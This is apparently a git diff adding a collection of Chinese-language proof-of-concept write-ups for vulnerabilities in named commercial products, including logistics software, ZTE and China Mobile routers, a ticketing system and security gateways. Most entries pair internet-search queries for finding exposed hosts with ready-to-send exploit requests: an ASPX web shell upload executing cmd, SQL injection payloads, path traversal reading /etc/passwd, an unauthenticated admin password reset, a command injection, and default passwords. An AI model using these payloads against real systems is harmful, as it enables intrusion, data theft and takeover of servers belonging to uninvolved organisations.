b/东胜物流软件CertUpload文件上传漏洞.md 
@@ -0,0 +1,35 @@ +# 东胜物流软件CertUpload文件上传漏洞 + +东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。由于东胜物流软件 CertUpload 接口处未对用户上传的文件进行合理的判断和过滤,导致存在文件上传漏洞,未经身份验证远程攻击者可利用该漏洞上传任意脚本文件,执行恶意代码,写入WebShell,进一步控制服务器权限。 + +## fofa + +```javascript +body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css" +``` + +## poc + +```javascript +POST /MsWlTruck/CertUpload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTqkdY1lCvbvpmown + +------WebKitFormBoundaryaKljzbg49Mq4ggLz +Content-Disposition: form-data; name="file"; filename="rce.aspx" +Content-Type: image/jpeg + +<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%> +------WebKitFormBoundaryaKljzbg49Mq4ggLz +Content-Disposition: form-data; name="TruckNo"; + +1 +------WebKitFormBoundaryaKljzbg49Mq4ggLz +Content-Disposition: form-data; name="Cert_Type"; + +1 +------WebKitFormBoundaryaKljzbg49Mq4ggLz-- +``` + +![image-20241122152041797](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221520864.png) \ No newline at end of file diff --git a/东胜物流软件GetDataListCA存在SQL注入漏洞.md b/东胜物流软件GetDataListCA存在SQL注入漏洞.md new file mode 100644 index 0000000..9318a2e --- /dev/null +++ b/东胜物流软件GetDataListCA存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +## 东胜物流软件GetDataListCA存在SQL注入漏洞 + +东胜物流软件GetDataListCA存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息。 + +## fofa + +```javascript +body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css" +``` + +## poc + +```javascript +GET /MvcShipping/MsCwGenlegAccitems/GetDataListCA?PACCGID=1%27%29+AND+6782+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%286782%3D6782%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29--+OevW HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +``` + +![image-20241114140448209](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141404276.png) diff --git a/东胜物流软件GetDataList存在SQL注入漏洞.md b/东胜物流软件GetDataList存在SQL注入漏洞.md new file mode 100644 index 0000000..8f7e360 --- /dev/null +++ b/东胜物流软件GetDataList存在SQL注入漏洞.md 
@@ -0,0 +1,33 @@ +# 东胜物流软件GetDataList存在SQL注入漏洞 + +# 一、漏洞简介 +东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。东胜物流软件 GetDataList接口处存在 SQL 注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 东胜物流软件 + +# 三、资产测绘 ++ fofa`fid="Z4c2hPCi5IR/AnH5vZXNSQ=="` ++ 特征 + +![1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04.png](./img/QafmrT00Cjqvxhgl/1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04-278539.png) + +# 四、漏洞复现 +```plain +GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort&condition=123+IN+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113))--%20&page=1&page=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: close +Accept-Encoding: gzip +``` + +![1708944988680-1741de01-6614-4b5a-8913-8f29d37c10da.png](./img/QafmrT00Cjqvxhgl/1708944988680-1741de01-6614-4b5a-8913-8f29d37c10da-630979.png) + +```plain +qxpqqqzkqq +``` + + + +> 更新: 2024-02-29 23:55:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mp5bydo55w118fyr> \ No newline at end of file diff --git a/东胜物流软件SaveUserQuerySetting存在SQL注入漏洞.md b/东胜物流软件SaveUserQuerySetting存在SQL注入漏洞.md new file mode 100644 index 0000000..849f60b --- /dev/null +++ b/东胜物流软件SaveUserQuerySetting存在SQL注入漏洞.md 
@@ -0,0 +1,39 @@ +# 东胜物流软件SaveUserQuerySetting存在SQL注入漏洞 + +# 一、漏洞简介 +东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。东胜物流软件 SaveUserQuerySetting接口处存在 SQL 注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 东胜物流软件 + +# 三、资产测绘 ++ fofa`fid="Z4c2hPCi5IR/AnH5vZXNSQ=="` ++ 特征 + +![1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04.png](./img/Z-zu1u1tj1z1oq2D/1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04-730451.png) + +# 四、漏洞复现 +```plain +POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 +Content-Length: 857 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Connection: close + +formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+sys.fn_VarBinToHexStr(hashbytes('MD5','hello')))+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D} +``` + +![1708936597114-d9d3ffd6-39ff-46a5-8c1a-089a70b86853.png](./img/Z-zu1u1tj1z1oq2D/1708936597114-d9d3ffd6-39ff-46a5-8c1a-089a70b86853-946114.png) + +```plain +qxpqq0x5d41402abc4b2a76b9719d911017c592qzkqq +``` + +![1708946240065-a4df07ad-6ae3-4004-97f5-d08bac4a7286.png](./img/Z-zu1u1tj1z1oq2D/1708946240065-a4df07ad-6ae3-4004-97f5-d08bac4a7286-976094.png) + + + +> 更新: 2024-02-29 23:55:41 +> 
原文: <https://www.yuque.com/xiaokp7/ocvun2/kmeubkhryrzmp90u> \ No newline at end of file diff --git a/东胜物流软件TCodeVoynoAdapter存在SQL注入漏洞.md b/东胜物流软件TCodeVoynoAdapter存在SQL注入漏洞.md new file mode 100644 index 0000000..5389706 --- /dev/null +++ b/东胜物流软件TCodeVoynoAdapter存在SQL注入漏洞.md 
@@ -0,0 +1,45 @@ +# 东胜物流软件TCodeVoynoAdapter存在SQL注入漏洞 + +# 一、漏洞简介 +东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。东胜物流软件 TCodeVoynoAdapter接口处存在 SQL 注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 东胜物流软件 + +# 三、资产测绘 ++ fofa`fid="Z4c2hPCi5IR/AnH5vZXNSQ=="` ++ 特征 + +![1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04.png](./img/rJIO5oV0sZk0LMxK/1708936256348-8d7bf6c6-a3aa-4202-9f9c-a325885eef04-580498.png) + +# 四、漏洞复现 +```plain +GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1'%20AND%202523%20IN%20(SELECT%20(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT%20SUBSTRING((ISNULL(CAST((%20sys.fn_VarBinToHexStr(hashbytes('MD5','hello')))%20AS%20NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))%20AND%20'uKco'%3d'uKco HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![1708936295313-27c1ae9a-9893-4fe5-8287-1cbd0d00ebfa.png](./img/rJIO5oV0sZk0LMxK/1708936295313-27c1ae9a-9893-4fe5-8287-1cbd0d00ebfa-836040.png) + +```plain +qxpqq0x5d41402abc4b2a76b9719d911017c592qzkqq +``` + +sqlmap + +```plain +GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![1708936414718-79468349-55d8-47d5-95d9-14824ae2eb8d.png](./img/rJIO5oV0sZk0LMxK/1708936414718-79468349-55d8-47d5-95d9-14824ae2eb8d-485496.png) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mb0ycgqbf4y3x7lf> \ No newline at end of file diff --git a/中兴H108NS路由器存在任意密码修改漏洞.md b/中兴H108NS路由器存在任意密码修改漏洞.md new file mode 100644 index 0000000..4ff7919 --- /dev/null +++ b/中兴H108NS路由器存在任意密码修改漏洞.md 
@@ -0,0 +1,46 @@ +# 中兴H108NS 路由器存在任意密码修改漏洞 + +### 一、漏洞描述 +中兴H108NS路由器tools_admin.asp接口处存在身份认证绕过漏洞,攻击者可利用该漏洞绕过身份认证允许访问路由器的管理面板修改管理员密码,获取用户的敏感信息 + +### 二、影响版本 +<font style="color:#000000;">中兴H108NS 路由器</font> + +### 三、资产测绘 +```plain +product="ZTE-H108NS" +``` + +![1720893566422-1dca4fef-cd22-42ec-a6c6-f1f781981eb1.png](./img/yg6Rd5hWh54g21ga/1720893566422-1dca4fef-cd22-42ec-a6c6-f1f781981eb1-490795.png) + +### 四、漏洞复现 +获取cookie + +```java +GET / HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip +``` + +![1720893478802-fc32d4a7-4418-4bdc-b001-79fad466674c.png](./img/yg6Rd5hWh54g21ga/1720893478802-fc32d4a7-4418-4bdc-b001-79fad466674c-592313.png) + +使用获取cookie修改密码 + +```java +POST /cgi-bin/tools_admin.asp HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +Cookie: SESSIONID=39a2aef8; +Accept-Encoding: gzip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + +adminFlag=1&CurrentAccess=0&uiViewTools_Password=123456&uiViewTools_PasswordConfirm=确认密码 +``` + +min/123456登录系统![1720893410557-a4febc66-46a5-477d-8c28-0218ba4363e7.png](./img/yg6Rd5hWh54g21ga/1720893410557-a4febc66-46a5-477d-8c28-0218ba4363e7-749875.png) + + + +> 更新: 2024-08-12 17:48:53 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vil2xt2pbg119yg4> \ No newline at end of file diff --git a/中兴H108NS路由器存在弱口令漏洞.md b/中兴H108NS路由器存在弱口令漏洞.md new file mode 100644 index 0000000..faf66e5 --- /dev/null +++ b/中兴H108NS路由器存在弱口令漏洞.md 
@@ -0,0 +1,26 @@ +# 中兴H108NS 路由器存在弱口令漏洞 + +### 一、漏洞描述 +中兴H108NS 路由器存在弱口令漏洞 + +### 二、影响版本 +<font style="color:#000000;">中兴H108NS 路由器</font> + +### 三、资产测绘 +```plain +product="ZTE-H108NS" +``` + +![1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b.png](./img/1oyAPl1XUS9_H-Ib/1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b-006737.png) + +### 四、漏洞复现 +```plain +admin/admin +``` + +![1720893594578-39dfeb43-19e8-4d63-bf9d-2e26120189e3.png](./img/1oyAPl1XUS9_H-Ib/1720893594578-39dfeb43-19e8-4d63-bf9d-2e26120189e3-508250.png) + + + +> 更新: 2024-08-12 17:48:53 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kwnbg3w5wxmx1crw> \ No newline at end of file diff --git a/中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md b/中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md new file mode 100644 index 0000000..c060ffd --- /dev/null +++ b/中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md @@ -0,0 +1,17 @@ +# 中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞 + +中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞,任意文件下载漏洞可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```javascript +title="ZSRV2路由器Web管理系统" +``` + +## poc + +``` +GET /css//../../../../../../../../etc/passwd HTTP/1.1 +Host: {{Hostname}} +``` + diff --git a/中国移动云控制台preview存在任意文件读取.md b/中国移动云控制台preview存在任意文件读取.md new file mode 100644 index 0000000..a9ae1e5 --- /dev/null +++ b/中国移动云控制台preview存在任意文件读取.md 
@@ -0,0 +1,27 @@ +# 中国移动云控制台preview存在任意文件读取 + +# 一、漏洞简介 +中国移动云控制台是一套用于统一查看和管理移动云产品及服务的系统,移动云控制台存在文件任意下载漏洞,攻击者可利用此漏洞获取任意文件信息。 + +# 二、影响版本 ++ 中国移动云控制台 + +# 三、资产测绘 ++ fofa`body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"` ++ 特征 + +![1717665626881-f95bf7e9-e0e5-418a-bccf-45b67fa9ea2f.png](./img/dwA7UL8Kn96zuHeq/1717665626881-f95bf7e9-e0e5-418a-bccf-45b67fa9ea2f-740575.png) + +# 四、漏洞复现 +```java +GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +``` + +![1717665679298-f02a0afd-8a0e-4cde-b779-7cb99b10ce9c.png](./img/dwA7UL8Kn96zuHeq/1717665679298-f02a0afd-8a0e-4cde-b779-7cb99b10ce9c-230957.png) + + + +> 更新: 2024-06-11 10:30:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sh18y2kvdy1ou9gn> \ No newline at end of file diff --git a/中国移动禹路由ExportSettings.sh存在信息泄露漏洞.md b/中国移动禹路由ExportSettings.sh存在信息泄露漏洞.md new file mode 100644 index 0000000..24fe215 --- /dev/null +++ b/中国移动禹路由ExportSettings.sh存在信息泄露漏洞.md 
@@ -0,0 +1,64 @@ +# 中国移动禹路由ExportSettings.sh存在信息泄露漏洞 + +## 一、漏洞简介 + 中移禹路由器是一款性能强大且功能丰富的无线路由器。它采用了最新的Wi-Fi 6技术,提供更快的速度和更稳定的连接。它支持双频段同时工作,2.4GHz和5GHz频段可同时提供高速的无线网络,满足多设备同时连接的需求。中移禹路由器还具备MU-MIMO技术,可以同时处理多个设备的数据传输,提供更快的速度和更稳定的连接。中移铁通禹路由器ExportSettings接口处存在信息泄露漏洞,恶意攻击者可能会利用此漏洞获取到登陆账户和密码,从而登录后台,使服务器处于不安全的状态。 + +## 二、资产测绘 +```plain +fofa:title="互联世界 物联未来-登录" +hunter:web.body="互联世界 物联未来-登录" +``` + +![1715321824315-4c4c83b0-d438-4f26-8f8b-e5f94fb2a3a6.png](./img/SVqYtlA8uAuRUiVF/1715321824315-4c4c83b0-d438-4f26-8f8b-e5f94fb2a3a6-827283.png) + +![1715321983112-15fbb15d-d528-42e9-ae4e-5aad9949c6ae.png](./img/SVqYtlA8uAuRUiVF/1715321983112-15fbb15d-d528-42e9-ae4e-5aad9949c6ae-628253.png) + +## 三、漏洞复现 +```http +GET /cgi-bin/ExportSettings.sh HTTP/1.1 +Host:127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 + +``` + +![1715322118808-18bfdc8e-7d0a-4a72-8285-1e03722d0c15.png](./img/SVqYtlA8uAuRUiVF/1715322118808-18bfdc8e-7d0a-4a72-8285-1e03722d0c15-396284.png) + +![1715322129700-996c3d40-cd72-4e91-86e7-f7bc9ee0262b.png](./img/SVqYtlA8uAuRUiVF/1715322129700-996c3d40-cd72-4e91-86e7-f7bc9ee0262b-534381.png) + +## 四、Nuclei +```http +id: ZYTT-ExportSettings-Info + +info: + name: 中移铁通禹路由器-信息泄露-ExportSettings + author: haoguoguo + severity: high + metadata: + fofa-query: title="互联世界 物联未来-登录" +variables: + filename: "{{to_lower(rand_base(5))}}" + boundary: "{{to_lower(rand_base(20))}}" +http: + - raw: + - | + GET /cgi-bin/ExportSettings.sh HTTP/1.1 + Host:{{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + Content-Length: 0 + + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"wan_ipaddr","HostName") +``` + +![1715322153837-15d20d64-a9ee-4f24-84af-cc2a5bdb87aa.png](./img/SVqYtlA8uAuRUiVF/1715322153837-15d20d64-a9ee-4f24-84af-cc2a5bdb87aa-356001.png) + + + + + +> 更新: 
2024-06-11 10:30:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qmarera6wxzybbby> \ No newline at end of file diff --git a/中成科信票务管理系统ReturnTicketPlance.ashx存在SQL注入.md b/中成科信票务管理系统ReturnTicketPlance.ashx存在SQL注入.md new file mode 100644 index 0000000..05ce2b9 --- /dev/null +++ b/中成科信票务管理系统ReturnTicketPlance.ashx存在SQL注入.md @@ -0,0 +1,25 @@ +# 中成科信票务管理系统ReturnTicketPlance.ashx存在SQL注入 + +中成科信票务管理系统 ReturnTicketPlance.ashx 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。 + +## fofa + +```yaml +icon_hash="1632964065" || icon_hash="-2142050529" +``` + +## poc + +```javascript +POST /SystemManager/TicketSystem/ReturnTicketPlance.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Connection: close + +Method=GetCheckInDetail&ticketNo='%20UNION%20ALL%20SELECT%20NULL,CHAR(113)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(74)+CHAR(79)+CHAR(112)+CHAR(87)+CHAR(122)+CHAR(103)+CHAR(66)+CHAR(87)+CHAR(118)+CHAR(107)+CHAR(77)+CHAR(103)+CHAR(121)+CHAR(119)+CHAR(87)+CHAR(69)+CHAR(102)+CHAR(68)+CHAR(112)+CHAR(105)+CHAR(97)+CHAR(75)+CHAR(105)+CHAR(77)+CHAR(106)+CHAR(66)+CHAR(73)+CHAR(102)+CHAR(122)+CHAR(78)+CHAR(80)+CHAR(81)+CHAR(83)+CHAR(66)+CHAR(71)+CHAR(102)+CHAR(73)+CHAR(74)+CHAR(80)+CHAR(65)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(122)+CHAR(113),NULL,NULL--%20BEsy +``` + diff --git a/中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞.md b/中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞.md new file mode 100644 index 0000000..6ee1bed --- /dev/null +++ b/中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞.md 
@@ -0,0 +1,32 @@ +# 中成科信票务管理系统UploadHandler.ashx任意文件上传漏洞 + +中成科信票务管理系统 UploadHandler.ashx 任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```javascript +icon_hash="1632964065" || icon_hash="-2142050529" +``` + +## poc + +```javascript +POST /WeChat/ashx/UploadHandler.ashx HTTP/2 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7yyQ5XLHOn6WZ6MT +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 + +------WebKitFormBoundary7yyQ5XLHOn6WZ6MT +Content-Disposition: form-data; name="file"; filename="1.asp" +Content-Type: image/jpeg + +<% Response.Write("Hello, World!") %> +------WebKitFormBoundary7yyQ5XLHOn6WZ6MT-- +``` + +![image-20241115101054420](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411151010495.png) + +文件路径:`/UploadImage/1.asp` \ No newline at end of file diff --git a/中新天达系统存在任意文件读取漏洞.md b/中新天达系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..c9eec65 --- /dev/null +++ b/中新天达系统存在任意文件读取漏洞.md @@ -0,0 +1,17 @@ +# 中新天达系统存在任意文件读取漏洞 + +中新天达系统`/aexp/ProxyDownload`存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```haskell +body="aexp/ValidateImage" +``` + +## poc + +```javascript +/aexp/ProxyDownload?path=/speedec/webapps/webftp/../../../../etc/passwd +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272013561.webp) \ No newline at end of file diff --git a/中新金盾信息安全管理系统存在默认管理员密码漏洞.md b/中新金盾信息安全管理系统存在默认管理员密码漏洞.md new file mode 100644 index 0000000..a4ffc1f --- /dev/null +++ b/中新金盾信息安全管理系统存在默认管理员密码漏洞.md 
@@ -0,0 +1,26 @@ +# 中新金盾信息安全管理系统存在默认管理员密码漏洞 + +# 一、漏洞简介 +中新金盾信息安全管理系统存在默认管理员密码漏洞 + +# 二、影响版本 ++ 中新金盾信息安全管理系统 + +# 三、资产测绘 +```plain +title="中新金盾信息安全管理系统" +``` + +![1717346225989-07bee9d9-2720-490c-9e8f-7a7c5b62b2fe.png](./img/Zh8oI4mLPdfVr30y/1717346225989-07bee9d9-2720-490c-9e8f-7a7c5b62b2fe-477213.png) + +# 四、漏洞复现 +```plain +admin/zxsoft1234!@#$ +``` + +![1717346140443-e800159a-5b34-4b6f-9c73-74167025ef2b.png](./img/Zh8oI4mLPdfVr30y/1717346140443-e800159a-5b34-4b6f-9c73-74167025ef2b-843162.png) + + + +> 更新: 2024-06-11 10:30:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aiqgb5g0s3ibbmf4> \ No newline at end of file diff --git a/中科网威anysec安全网关arping存在后台远程命令执行漏洞.md b/中科网威anysec安全网关arping存在后台远程命令执行漏洞.md new file mode 100644 index 0000000..56589b8 --- /dev/null +++ b/中科网威anysec安全网关arping存在后台远程命令执行漏洞.md 
@@ -0,0 +1,38 @@ +# 中科网威anysec安全网关arping存在后台远程命令执行漏洞 +深圳市中科网威科技有限公司是一家专注于网络安全产品研发和生产的高新技术企业。‌中科网威anysec安全网关存在arping后台远程命令执行漏洞,攻击者可利用该漏洞获取网关权限。 + +## fofa + +```javascript +app="中科网威-anysec" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1733735125819-6e44adad-f0c0-4cdc-bab4-d2def9afe4e6.png) + +## poc +1. 使用弱口令`admin/anysec`登录系统 +2. 执行命令 + +```java +POST /cgi-bin/system/arping.cgi HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br, zstd +Content-Type: application/x-www-form-urlencoded +Content-Length: 80 +Connection: keep-alive +Cookie: CGISID=2ZuEDPfh3Yxu6hyiAmyZpxIHymc9vSfxGJbcqhtl8RP51; sdmenu_my_menu=100000000 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: frame +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Priority: u=4 + +moduleid=150&tasknum=1&ip=127.0.0.1;whoami&interface=wan0&count=4&sip=8.8.8.8&x=58&y=16 +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734016663310-d6fe8c5a-89a6-47b8-b6d2-91427144aeff.png) + diff --git a/中科网威下一代防火墙控制系统download存在任意文件读取漏洞.md b/中科网威下一代防火墙控制系统download存在任意文件读取漏洞.md new file mode 100644 index 0000000..2150597 --- /dev/null +++ b/中科网威下一代防火墙控制系统download存在任意文件读取漏洞.md 
@@ -0,0 +1,31 @@ +# 中科网威下一代防火墙控制系统download存在任意文件读取漏洞 + +# 一、漏洞简介 +中科网威-防火墙控制系统是一款由中科网威有限公司开发的网络安全产品,它是基于软件的网络防火墙解决方案,为企业提供了完整的网络安全保障,漏洞点位于:download.php 由于开发人员未对该文件做鉴权,导致恶意攻击者可未授权访读取任意文件。 + +# 二、影响版本 ++ 中科网威下一代防火墙控制系统 + +# 三、资产测绘 +```plain +fofa:body="Get_Verify_Info(hex_md5(user_string)." +``` + +![1716105114884-70a33e88-bcbd-4a6e-875c-dbbbf08ca27f.png](./img/9XBQdpMPoIfBB4EZ/1716105114884-70a33e88-bcbd-4a6e-875c-dbbbf08ca27f-151998.png) + +# 四、漏洞复现 +```plain +GET /download.php?&class=vpn&toolname=../../../../../../../../etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Connection: close + +``` + +![1716105138745-69a8dbc8-b354-4d9a-a1a3-ef939ec89748.png](./img/9XBQdpMPoIfBB4EZ/1716105138745-69a8dbc8-b354-4d9a-a1a3-ef939ec89748-656214.png) + + + +> 更新: 2024-05-23 12:38:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qcctbq425bs1ghp6> \ No newline at end of file diff --git a/中科网威下一代防火墙控制系统存在账号密码泄露漏洞.md b/中科网威下一代防火墙控制系统存在账号密码泄露漏洞.md new file mode 100644 index 0000000..afe7080 --- /dev/null +++ 